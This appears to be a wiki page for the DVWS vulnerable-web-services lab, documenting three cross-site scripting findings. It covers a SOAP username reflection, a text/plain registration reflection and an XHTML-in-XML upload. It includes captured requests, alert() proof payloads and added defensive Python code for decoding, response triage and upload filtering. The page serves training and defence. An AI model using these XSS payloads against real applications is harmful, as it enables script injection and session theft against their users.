
Cross Site Scripting (XSS)

Sam Sanoop edited this page Dec 14, 2020 · 5 revisions

Introduction

Cross-Site Scripting (XSS) occurs when an attacker can inject malicious script into content that an application delivers to other users. The web application is the carrier: the injected code, typically a browser-side script, is served to a victim's browser and executes there under the application's origin, with access to the victim's session and DOM.

Details

XML Cross-Site Scripting (XSS)

Within the DVWS Admin User Search area, an XSS vulnerability exists. It is possible to submit JavaScript such as <script>alert(document.domain)</script> in XML-entity-encoded form (&lt;script&gt;alert(document.domain)&lt;/script&gt;), which is sent in the following request.

POST /dvwsuserservice HTTP/1.1
Host: dvws.local
Content-Length: 507
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyMiIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiLCJ1c2VyOmFkbWluIl0sImlhdCI6MTU5MTQ1NTQ0NywiZXhwIjoxNTkxNjI4MjQ3LCJpc3MiOiJodHRwczovL2dpdGh1Yi5jb20vc25vb3B5c2VjdXJpdHkifQ.Ja26PD9TTtj3cpbMh--JJ0NDD-4r9gZUIEuat2jW6OQ
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4164.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Origin: http://dvws.local
Referer: http://dvws.local/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:Username soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <username xsi:type="xsd:string">&lt;script&gt;alert(document.domain)&lt;/script&gt;</username>
      </urn:Username>
   </soapenv:Body>
</soapenv:Envelope>

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/xml; charset=utf-8
Content-Length: 584
ETag: W/"248-5YsQiOv7dlT381ic1AkKX2OTHss"
Date: Sat, 06 Jun 2020 14:58:07 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:UsernameResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <username xsi:type="xsd:string">User Not Found:&lt;script&gt;alert(document.domain)&lt;/script&gt;</username>
    </urn:UsernameResponse>
  </soapenv:Body>
</soapenv:Envelope>

The client-side JavaScript on admin.html parses the SOAP response and reads the username element. XML parsing undoes the entity encoding, so the value the client obtains is the literal string User Not Found:<script>alert(document.domain)</script>; inserting that value into the page as HTML rather than as text executes the script. Note that the response on the wire is correctly encoded and well-formed XML: the vulnerability is in the client-side sink, not in the SOAP response itself, so a check that only inspects the raw response body for unencoded tags will miss it.

(Screenshot: xmlxss)
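The request and response above, reproduced offline as an added example (editor's illustration code, not DVWS code): the envelope is built with Python's ElementTree so the payload is entity-encoded exactly as in the capture, the response is a constructed copy of the one shown above (nothing is sent to dvws.local), and the two render_* functions are hypothetical stand-ins for an innerHTML-style and a textContent-style client sink.

```python
"""Added example (not DVWS code): build the SOAP Username request so that the
payload is entity-encoded as in the request above, then parse the reflected
response the way a client does and show why the decoded value is unsafe for
an HTML sink. Runs offline: RESPONSE is a constructed copy of the capture."""
import html
import xml.etree.ElementTree as ET

SOAPENV = "http://schemas.xmlsoap.org/soap/envelope/"
XSI = "http://www.w3.org/2001/XMLSchema-instance"
XSD = "http://www.w3.org/2001/XMLSchema"
URN = "urn:examples:usernameservice"
NS = {"soapenv": SOAPENV, "urn": URN}

PAYLOAD = "<script>alert(document.domain)</script>"


def build_username_request(username: str) -> bytes:
    """Serialise a urn:Username request. ElementTree escapes < > & in text
    nodes, which is where the &lt;script&gt; form in the capture comes from."""
    for prefix, uri in (("soapenv", SOAPENV), ("xsi", XSI), ("urn", URN)):
        ET.register_namespace(prefix, uri)
    env = ET.Element(f"{{{SOAPENV}}}Envelope")
    # xsd is only referenced inside an attribute value, so declare it by hand.
    env.set("xmlns:xsd", XSD)
    ET.SubElement(env, f"{{{SOAPENV}}}Header")
    body = ET.SubElement(env, f"{{{SOAPENV}}}Body")
    op = ET.SubElement(body, f"{{{URN}}}Username")
    user = ET.SubElement(op, "username", {f"{{{XSI}}}type": "xsd:string"})
    user.text = username
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


# Constructed copy of the 200 response shown above (not captured live here).
RESPONSE = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:UsernameResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <username xsi:type="xsd:string">User Not Found:&lt;script&gt;alert(document.domain)&lt;/script&gt;</username>
    </urn:UsernameResponse>
  </soapenv:Body>
</soapenv:Envelope>
"""


def extract_username(soap_response: bytes) -> str:
    """What the client gets after XML parsing: entities are already decoded,
    so this returns a string containing a literal <script> element."""
    root = ET.fromstring(soap_response)
    node = root.find(".//urn:UsernameResponse/username", NS)
    return node.text if node is not None and node.text else ""


def render_unsafe(value: str) -> str:
    """Hypothetical innerHTML-style sink: the decoded value is spliced into
    markup unchanged, so reflected HTML is live (with innerHTML specifically,
    <script> elements are inert but handlers such as onerror still fire)."""
    return f'<div id="result">{value}</div>'


def render_safe(value: str) -> str:
    """Hypothetical textContent-style sink: escape before the value meets
    HTML, so the browser shows the tag text instead of interpreting it."""
    return f'<div id="result">{html.escape(value, quote=True)}</div>'


if __name__ == "__main__":
    req = build_username_request(PAYLOAD)
    print("on the wire   :", req.decode())
    decoded = extract_username(RESPONSE)
    print("decoded value :", decoded)
    print("unsafe sink   :", render_unsafe(decoded))
    print("safe sink     :", render_safe(decoded))
```

The takeaway for testing SOAP-backed pages: the entity encoding in the request and response is the transport doing its job, not a defence. Decode the value the way the client does (parse the XML) and then judge the sink it lands in.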

Content Type Cross-Site Scripting (XSS)

An XSS vulnerability exists within the login area of DVWS. When registering a user, the following request is sent to the backend API.

(Screenshot: content-type-xss-1, the registration request)

If the same username already exists, a response such as the one shown above is sent back to the client. In this instance the response is served with Content-Type: text/plain and the reflected username is not HTML-encoded.

(Screenshot: content-type-xss-2, the registration response)
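A triage check for responses like the one described above, as an added example (editor's code, not DVWS code). It reads a raw HTTP response and rates a reflected probe by the two things that matter here: whether the probe comes back unencoded, and whether Content-Type and X-Content-Type-Options let the browser interpret the body as HTML. Both responses in the block are constructed stand-ins, not captures from DVWS, and the probe string is an assumption.

```python
"""Added example (not DVWS code): triage a captured HTTP response for the two
conditions behind the registration-endpoint reflection above. A reflected
probe is a browser-side XSS only if it comes back unencoded AND the response
can be interpreted as HTML; Content-Type and X-Content-Type-Options decide the
second half. Both responses below are constructed stand-ins, not captures."""
import html
import json

PROBE = "<img src=x onerror=alert(1)>"

# Media types a browser will not render as an HTML document once nosniff
# forbids sniffing. XML types are deliberately absent: XML can carry XHTML.
PINNED_NON_HTML = {"application/json", "text/plain"}


def parse_http_response(raw: bytes):
    """Split a raw response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("utf-8", errors="replace")


def classify_reflection(probe: str, headers: dict, body: str) -> dict:
    """Rate a reflection of `probe` by how the browser will treat the body."""
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    reflected_raw = probe in body
    reflected_encoded = html.escape(probe, quote=True) in body
    if reflected_raw and ctype in {"text/html", "application/xhtml+xml"}:
        verdict = "vulnerable"   # markup is live as soon as the page renders
    elif reflected_raw and not (nosniff and ctype in PINNED_NON_HTML):
        verdict = "suspect"      # unencoded, and type/nosniff do not rule out HTML
    elif reflected_raw:
        verdict = "low"          # unencoded but pinned to non-HTML; audit the client sink
    else:
        verdict = "clean"        # not reflected, or encoded on output
    return {
        "content_type": ctype or "(missing)",
        "nosniff": nosniff,
        "reflected_raw": reflected_raw,
        "reflected_encoded": reflected_encoded,
        "verdict": verdict,
    }


def triage(raw: bytes, probe: str = PROBE) -> dict:
    status, headers, body = parse_http_response(raw)
    result = classify_reflection(probe, headers, body)
    result["status"] = status
    return result


# Constructed stand-in for the "user already exists" reply described above:
# text/plain, no nosniff, username echoed without encoding.
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"X-Powered-By: Express\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"User <img src=x onerror=alert(1)> already exists"
)

# Constructed hardened variant: a JSON body with the real media type and
# nosniff. The value is still unencoded here because JSON is data, not markup;
# HTML-encoding is the consuming page's job at the point of insertion.
HARDENED_RESPONSE = (
    b"HTTP/1.1 409 Conflict\r\n"
    b"Content-Type: application/json; charset=utf-8\r\n"
    b"X-Content-Type-Options: nosniff\r\n"
    b"\r\n"
    + json.dumps({"error": "user already exists", "username": PROBE}).encode("utf-8")
)

if __name__ == "__main__":
    for name, raw in (("vulnerable", VULNERABLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(name, triage(raw))
```

A "suspect" result on a text/plain reflection, the case above, means the finding still needs confirming in the client: modern browsers do not render a top-level text/plain response as HTML, so exploitability depends on what the page's JavaScript does with the response body. The remediation is the same either way: encode the username on output, send the media type the body actually has (application/json for this API), and add X-Content-Type-Options: nosniff.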

XML File Upload Cross-Site Scripting (XSS)

It is possible to upload an XML file that contains XHTML. When the browser renders the uploaded file as XML, it recognises elements in the XHTML namespace (http://www.w3.org/1999/xhtml) and executes the embedded script:

<?xml version="1.0" encoding="UTF-8"?>
<xhtml:html xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <xhtml:script>
    alert(1)
  </xhtml:script>
</xhtml:html>

More payloads of this kind can be found in PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/xss.xml

(Screenshot: xss-1)

(Screenshot: xss-2)
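A server-side gate that would have rejected the upload above, as an added example (editor's code, not part of DVWS). The check is namespace-aware rather than prefix-based, so it goes beyond the single payload shown: it catches the prefixed xhtml: form, a default-namespace <html xmlns="http://www.w3.org/1999/xhtml">, SVG, inline on* event handlers and xml-stylesheet processing instructions. The sample documents and the size limit are constructed for the demonstration.

```python
"""Added example (not DVWS code): a server-side gate for XML uploads that
rejects documents able to run script when a browser renders them as XML.
It is namespace-aware, so it catches the prefixed xhtml: form shown above,
a default-namespace <html xmlns="http://www.w3.org/1999/xhtml">, SVG, inline
event handlers and xml-stylesheet processing instructions alike. All sample
documents below are constructed for the demonstration."""
import io
import xml.etree.ElementTree as ET

# Namespaces whose elements browsers execute script from inside an XML document.
SCRIPT_CAPABLE_NS = {
    "http://www.w3.org/1999/xhtml",
    "http://www.w3.org/2000/svg",
}
MAX_BYTES = 1_000_000  # assumed limit: bound parser work before looking at content


def split_tag(tag: str):
    """ElementTree spells qualified names '{uri}local'; unqualified -> ('', local)."""
    if tag.startswith("{"):
        uri, _, local = tag[1:].partition("}")
        return uri, local
    return "", tag


def check_xml_upload(data: bytes) -> list:
    """Return the reasons to reject an upload; an empty list means accept.
    Well-formedness comes from the stdlib parser, which does not fetch
    external entities; entity-expansion limits are a separate concern."""
    if len(data) > MAX_BYTES:
        return ["file too large"]
    reasons = set()
    try:
        for event, elem in ET.iterparse(io.BytesIO(data), events=("start", "pi")):
            if event == "pi":
                # <?xml-stylesheet?> lets the document pull in XSLT or CSS when rendered
                target = (elem.text or "").split(None, 1)
                if target and target[0] == "xml-stylesheet":
                    reasons.add("xml-stylesheet processing instruction")
                continue
            uri, local = split_tag(elem.tag)
            if uri in SCRIPT_CAPABLE_NS:
                reasons.add(f"element <{local}> in script-capable namespace {uri}")
            for attr in elem.attrib:
                _, aname = split_tag(attr)
                if aname.lower().startswith("on"):   # coarse match for on* handlers
                    reasons.add(f"event handler attribute {aname}")
    except ET.ParseError as exc:
        reasons.add(f"not well-formed XML: {exc}")
    return sorted(reasons)


# The payload from the page, as an upload body.
PAGE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<xhtml:html xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <xhtml:script>alert(1)</xhtml:script>
</xhtml:html>
"""
# Same trick with a default namespace and an event handler instead of <script>.
DEFAULT_NS_PAYLOAD = b'<html xmlns="http://www.w3.org/1999/xhtml"><body onload="alert(1)"/></html>'
STYLESHEET_PAYLOAD = b'<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="x.xsl"?><data/>'
BENIGN = b'<?xml version="1.0"?><inventory><item id="1">widget</item></inventory>'

if __name__ == "__main__":
    for name, doc in (("page payload", PAGE_PAYLOAD), ("default ns", DEFAULT_NS_PAYLOAD),
                      ("stylesheet", STYLESHEET_PAYLOAD), ("benign", BENIGN)):
        print(f"{name:13} -> {check_xml_upload(doc) or 'accepted'}")
```

Content inspection is one layer; the upload should also be served back with a Content-Disposition: attachment header and X-Content-Type-Options: nosniff so that a file which slips through is downloaded rather than rendered in the application's origin.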
